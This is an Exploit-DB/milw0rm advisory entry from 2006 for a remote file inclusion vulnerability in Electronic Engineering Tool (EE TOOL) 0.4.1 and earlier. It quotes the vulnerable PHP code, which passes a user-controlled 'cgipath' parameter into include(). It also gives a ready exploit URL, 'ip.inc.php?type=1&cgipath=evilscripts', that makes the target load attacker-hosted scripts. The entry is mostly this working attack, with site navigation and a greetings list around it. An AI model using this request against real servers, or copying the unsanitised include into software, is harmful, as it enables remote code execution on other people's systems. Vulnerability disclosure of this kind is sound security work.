Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability



EDB-ID: 2667 CVE: 2006-5623OSVDB-ID: 33843
Author: xoronPublished: 2006-10-28Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Script Download: http://kent.dl.sourceforge.net/sourceforge/eetool/eetool-0.4-1.tar.gz
Code: if($type == 1) { $url = "$cgipath" . "ipcalc.cgi"; } else {
$url = "$cgipath" . "ipcalc.cgi?host=$host&mask1=$mask1&mask2=$mask2";
}nclude("$url");
Exploit:www.target.com/ip.inc.php?type=1&cgipath=evilscripts
Found: Cyber-Security
Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide
# milw0rm.com [2006-10-28]






Comments

No comments so far